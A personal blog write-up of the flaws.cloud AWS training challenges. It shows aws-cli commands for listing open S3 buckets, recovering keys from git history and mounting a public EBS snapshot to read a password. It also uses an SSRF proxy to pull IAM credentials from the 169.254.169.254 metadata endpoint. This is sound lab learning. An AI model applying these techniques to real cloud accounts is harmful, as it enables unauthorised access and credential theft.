Flaws.cloud

Hey guys! I completed the flaws.cloud challenges some time ago. They're pretty easy and already come with lots of hints, but I thought I would write a short post on them anyway, both as a note to myself and in the hope of helping anyone stuck at some point. I recommend trying to complete the challenges without reading this first, though.

Challenge 1

First "Brute" method (the wrong way)

We are asked to find the first challenge subdomain. The first idea that comes to mind is to enumerate subdomains, either with Google dorking, fierce.pl or a similar tool. I gave Sublist3r a shot and retrieved a few results.

Sublist3r results

As you can see, the subdomains contain a random hexadecimal string, so carrying on with subbrute would be useless and I killed the script.

We do get a few subdomains; however, the home page URL states the following:

homepage statement

So using Sublist3r is definitely not the right way to go! :'-(

Second method (the right way)

Retrieving the website's IP is trivial:

$ dig +short flaws.cloud
52.218.200.219

Browsing to the IP redirects us to https://aws.amazon.com/s3/, as explained in hint 1. This technique makes it easy to fingerprint a website and tell that it is hosted on an S3 bucket.

The hint also tells us how to figure out the AWS region in which the bucket is hosted.

$ nslookup 52.218.200.219
Non-authoritative answer:
219.200.218.52.in-addr.arpa    name = s3-website-us-west-2.amazonaws.com.
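The region code can be read straight out of that reverse-DNS name. Here is a small sketch of the extraction; the hostname is hard-coded from the nslookup output above so the pipeline can be shown without any network access:

```shell
# Extract the region code from the s3-website-<region>.amazonaws.com
# hostname returned by the reverse lookup. Hard-coded here from the
# nslookup output above so this runs offline.
host="s3-website-us-west-2.amazonaws.com"
region=$(echo "$host" | sed -E 's/^s3-website[.-]([a-z0-9-]+)\.amazonaws\.com\.?$/\1/')
echo "$region"
```

The `[.-]` in the pattern is there because some regions use `s3-website.<region>` (dot) rather than `s3-website-<region>` (dash) in the hostname.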

If you don't know about AWS regions, you should read the documentation; I find it very complete and self-explanatory!

Once we know the AWS region, we can fire up aws-cli and browse the S3 bucket. aws-cli is a command line interface that lets a user interact with many different AWS services.

aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2

Note that according to the documentation there is only a limited number of regions, so brute-forcing the region with the table below would also work. In this particular case, the command even works without specifying the region at all.

Code            Name

us-east-1       US East (N. Virginia)
us-east-2       US East (Ohio)
us-west-1       US West (N. California)
us-west-2       US West (Oregon)
ca-central-1    Canada (Central)
eu-west-1       EU (Ireland)
eu-central-1    EU (Frankfurt)
eu-west-2       EU (London)
ap-northeast-1  Asia Pacific (Tokyo)
ap-northeast-2  Asia Pacific (Seoul)
ap-southeast-1  Asia Pacific (Singapore)
ap-southeast-2  Asia Pacific (Sydney)
ap-south-1      Asia Pacific (Mumbai)
sa-east-1       South America (São Paulo)
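Since the table only has 14 entries, the brute force is a short loop. A sketch, assuming the aws CLI is installed: it simply tries each region code until the unauthenticated listing succeeds.

```shell
# Try each region code from the table until the unauthenticated
# listing succeeds. Assumes the aws CLI is installed.
regions="us-east-1 us-east-2 us-west-1 us-west-2 ca-central-1 eu-west-1
eu-central-1 eu-west-2 ap-northeast-1 ap-northeast-2 ap-southeast-1
ap-southeast-2 ap-south-1 sa-east-1"

for r in $regions; do
  if aws s3 ls s3://flaws.cloud/ --no-sign-request --region "$r" >/dev/null 2>&1; then
    echo "bucket region: $r"
    break
  fi
done
```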

If you are unsure what command to run you can get a man page with:

 $ aws help
 $ aws <command> help
 $ aws <command> <subcommand> help

Anyway, the aws command mentioned above gives the following:

aws Command

Going to flaws.cloud/secret-dd02c7c.html gives us the link to the next challenge.
Yay! \^o^/

Please read hint 2 to learn about other methods, such as visiting http://flaws.cloud.s3.amazonaws.com/, which lists the files thanks to the permission issues on this bucket.

Challenge 2

This challenge is similar to the first, but the IAM (Identity and Access Management) rights were misconfigured a bit differently: this time we need an AWS free tier account. Cool! I just happen to have one :-D

We connect to our AWS free tier account (I'm not going over how to set this up as it's very easy!).

search for IAM service

Once in, we select Users -> Add user.

Add user

We then make sure to tick "Programmatic access" in the "Access type" section.

Programmatic access

In the second step, choose "Attach existing policies directly" and select "AdministratorAccess".

Admin access

Once this step is done, you will get two keys: an access key ID, which is similar to a login name, and a secret access key. As you guessed, no one else should know your secret access key...

Keys

We can now configure aws cli by running:

$ aws configure --profile <myNewAccount>

We then run the challenge 1 command again, which gives the following result:

aws cli account configuration
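For reference, all `aws configure --profile` does is write an INI section to `~/.aws/credentials`. The sketch below recreates that file by hand in /tmp; the key values are the standard AWS documentation placeholders, not real credentials.

```shell
# Recreate by hand what `aws configure --profile myNewAccount` writes.
# The key values are AWS documentation placeholders, not real credentials.
mkdir -p /tmp/aws-demo
cat > /tmp/aws-demo/credentials <<'EOF'
[myNewAccount]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
EOF
cat /tmp/aws-demo/credentials
```

Pointing the CLI at this file with `AWS_SHARED_CREDENTIALS_FILE=/tmp/aws-demo/credentials` works the same as the default `~/.aws/credentials` location.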

Visiting the secret-e4443fc.html page leaks the challenge 3 link.

Challenge 3

We begin by listing the files with the command we now know so well:

$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --no-sign-request
                           PRE .git/
2017-02-27 01:14:33     123637 authenticated_users.png
2017-02-27 01:14:34       1552 hint1.html
2017-02-27 01:14:34       1426 hint2.html
2017-02-27 01:14:35       1247 hint3.html
2017-02-27 01:14:33       1035 hint4.html
2017-02-27 03:05:16       1703 index.html
2017-02-27 01:14:33         26 robots.txt

We can download the whole bucket with:

$ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2

Once the files are downloaded, we can look at the git commit history with git log (I piped it to cat to fit the command on the screenshot).

git history

Hmmm... Commit "2921eed99c1045b6ce2063e4eedc3923d474f891" seems interesting. Let's check out what the state of the repository was before that commit:

$ git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87

List all buckets that belong to account

This challenge exposes credentials left in a git commit, something that happens now and then with version control tools. What is good to know is that Amazon has a bot on GitHub that revokes any private keys it finds in public commits.
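The whole mechanic is easy to reproduce locally: a file committed and then deleted is gone from the working tree but trivially recoverable from history. A throwaway-repo sketch (the key string is fake, nothing real):

```shell
# Recreate the "committed then deleted" credential leak in a throwaway
# repo, then recover the secret from history with git grep.
dir=$(mktemp -d) && cd "$dir"
git init -q .
echo "access_key = AKIAFAKEFAKEFAKEFAKE" > access_keys.txt
git add access_keys.txt
git -c user.email=me@example.com -c user.name=demo commit -qm "first commit"
git rm -q access_keys.txt
git -c user.email=me@example.com -c user.name=demo commit -qm "Oops, remove keys"
ls access_keys.txt 2>/dev/null || echo "gone from the working tree"
git grep AKIAFAKE $(git rev-list --all)    # ...but still in history
```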

Challenge 4

In this challenge we need to get the password to login to
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/. If we enter the wrong credentials we get the following 401 response disclosing information about the server.

Nginx server

Using the account we got from challenge 3, we can get the unique user ID of the flaws profile.

$ aws --profile flaws sts get-caller-identity
{
    "Account": "975426262029", 
    "UserId": "AIDAJQ3H5DC3LEG2BKSLC", 
    "Arn": "arn:aws:iam::975426262029:user/backup"
}
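As an aside, the account ID can be pulled out of that JSON directly. In the sketch below the JSON is inlined from the output above so the extraction runs without credentials; with real credentials, `aws sts get-caller-identity --query Account --output text` does the same in one go.

```shell
# Pull the 12-digit account ID out of the get-caller-identity JSON.
# The JSON is inlined from the output above so this runs offline.
json='{"Account": "975426262029", "UserId": "AIDAJQ3H5DC3LEG2BKSLC", "Arn": "arn:aws:iam::975426262029:user/backup"}'
account=$(echo "$json" | sed -E 's/.*"Account": "([0-9]+)".*/\1/')
echo "$account"
```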

We can also use this ID to get the list of snapshots this account (called backup) made:

$ aws --profile flaws  ec2 describe-snapshots --owner-id 975426262029 --region us-west-2
{
    "Snapshots": [
        {
            "Description": "", 
            "Tags": [
                {
                    "Value": "flaws backup 2017.02.27", 
                    "Key": "Name"
                }
            ], 
            "Encrypted": false, 
            "VolumeId": "vol-04f1c039bc13ea950", 
            "State": "completed", 
            "VolumeSize": 8, 
            "StartTime": "2017-02-28T01:35:12.000Z", 
            "Progress": "100%", 
            "OwnerId": "975426262029", 
            "SnapshotId": "snap-0b49342abd1bdcb89"
        }
    ]
}

(I specified the --region parameter as I left it blank in the aws configure --profile command).

Cool! We got the snapshot ID. As it is a public snapshot, it's easy to retrieve and mount on a free tier EC2 instance in our own account.

$ aws --profile warsangtemp ec2 create-volume --availability-zone us-west-2b --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89

Be careful which availability zone you choose here: I had to choose us-west-2b because, at the time of writing, I could not create an EC2 instance in us-west-2a.

The screenshot below shows the commands I entered (however, as explained above, I had to choose a different availability zone, which is not shown here).
Creating a new volume from the snapshot
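One step that is easy to miss: after create-volume, the volume still has to be attached to the instance before it shows up as a block device. A sketch with placeholder IDs (substitute the volume ID returned by create-volume and your own instance ID):

```shell
# Attach the restored volume so it appears as /dev/xvdf inside the
# instance. Both IDs below are placeholders, not the real ones.
VOLUME_ID="vol-0123456789abcdef0"     # from the create-volume output
INSTANCE_ID="i-0123456789abcdef0"     # your running EC2 instance
out=$(aws --profile warsangtemp ec2 attach-volume --region us-west-2 \
      --volume-id "$VOLUME_ID" --instance-id "$INSTANCE_ID" \
      --device /dev/sdf 2>/dev/null \
      || echo "attach failed: replace the placeholder IDs first")
echo "$out"
```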

Creating the EC2 instance is very simple. Search for EC2 in the service search bar, go to Instances -> Launch Instance and choose the free tier Ubuntu x64 image.

Free tier EC2 instance

You can then select all the defaults for the following steps. Just make sure the second step also uses a free tier eligible option.

Free tier option

Oh, and on the last step, you might want to create a new SSH key or use your own.

Key pair

You can now launch your EC2 instance (this normally happens as soon as you press the Launch button in the screenshot above) and connect using ssh.

$ ssh -i flawscloud.pem ubuntu@ec2-52-37-129-99.us-west-2.compute.amazonaws.com

We can now mount the snapshot:

$ lsblk
NAME    MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
xvda    202:0    0   8G  0 disk 
`-xvda1 202:1    0   8G  0 part /
xvdf    202:80   0   8G  0 disk 
`-xvdf1 202:81   0   8G  0 part
$ sudo file -s /dev/xvdf1
/dev/xvdf1: Linux rev 1.0 ext4 filesystem data, UUID=5a2075d0-d095-4511-bef9-802fd8a7610e, volume name "cloudimg-rootfs" (needs journal recovery) (extents) (large files) (huge files)
$ sudo mount /dev/xvdf1 /mnt
$ ls /mnt
bin  boot  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  sys  tmp  usr  var  vmlinuz  vmlinuz.old

The /dev/xvdf1 block device might actually have another name for you. Take a look in /dev and use the file -s command just to make sure.

Remember the error message we got earlier showing there was an Nginx server running? Let's try to find an Nginx-related file and read its contents.

$ cat $(find . -name "*Nginx*" 2> /dev/null)
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Entering the username and password on the blocked page gives us a link to challenge 5!

Challenge 5

We are asked to list the contents of the level 6 bucket; going to the level 6 link returns an error message.

Level 6 denied access

Level 5 makes use of a proxy to query other pages:

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/<MycoolWebsite.something>

I really had no idea where to go from there, as I couldn't list the contents right away using aws-cli. I looked at hint 1, which told me to try the IP 169.254.169.254, which allows an instance to view its metadata.

$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
1.0
2007-01-19
2007-3-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
latest

The http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest URL seemed interesting, as meta-data did not return any results...

latest

I don't know much about AWS, but I do know that IAM (Identity and Access Management) is usually where an attacker wants to go to find interesting data. However, just appending iam to the link did not return anything interesting, so I went and read the (awesome) AWS documentation and stumbled upon something.

Something I stumbled upon

Trying "iam/info" returned the following:

iam/info

So we now know there's a user named flaws associated with this EC2 instance. Going to "/iam/security-credentials/flaws" should return something, right?...

result of /iam/security-credentials/flaws

Bingo! Some interesting data :D. But just using aws configure --profile is not enough this time: we need to add the session token somehow. Typing aws configure help or reading hint 3 gives the answer. Don't use the credentials in hint 3 as they have expired; use your own.
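What makes instance-profile credentials different is that third value, the session token, which plain `aws configure` never prompts for. One way is to add an `aws_session_token` line to the profile by hand; in the sketch below, all three values are placeholders for the ones you pull from the metadata endpoint:

```shell
# Instance-profile credentials are temporary and need all three values,
# including aws_session_token, which `aws configure` does not prompt for.
# All values here are placeholders, not real credentials.
creds=/tmp/level5-credentials
cat > "$creds" <<'EOF'
[level5]
aws_access_key_id = ASIAEXAMPLEKEYID12345
aws_secret_access_key = exampleSecretAccessKey0000000000000000000
aws_session_token = exampleSessionTokenFromTheMetadataEndpoint
EOF
cat "$creds"
```

Point the CLI at it with `AWS_SHARED_CREDENTIALS_FILE` (or put the section in `~/.aws/credentials`) and `--profile level5` picks it up. Alternatively, `aws configure set aws_session_token <token> --profile level5` writes the same line.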

$ aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
                           PRE ddcc78ff/
2017-02-27 03:11:07        871 index.html

Going to http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/ gives us level 6.

Challenge 6

For the final challenge we get a user access key and a secret key with a SecurityAudit IAM policy attached (remember how we defined these in challenge 2?).

So we fire up aws configure:

$ aws configure --profile level6

A quick Google search for "SecurityAudit IAM policy" returns the following link.

I won't finish this write-up, as the rest is just following the hint instructions from level 6 and I don't believe I can add anything useful to those hints. That said, completing challenge 6 without reading the hints is pretty difficult for anyone who hasn't played with AWS before, short of reading a lot of documentation!

Big thanks to Scott Piper (@0xdabbad00) and summitroute.com, from whom I learnt a lot about AWS!

All the links to the challenges and the end page:
Level1 Level2 Level3 Level4 Level5 Level6 End

Here is some extra reading on AWS security:

Security audit

AWS security model whitepaper (In French)

Cloudsploit

Cloudsploit github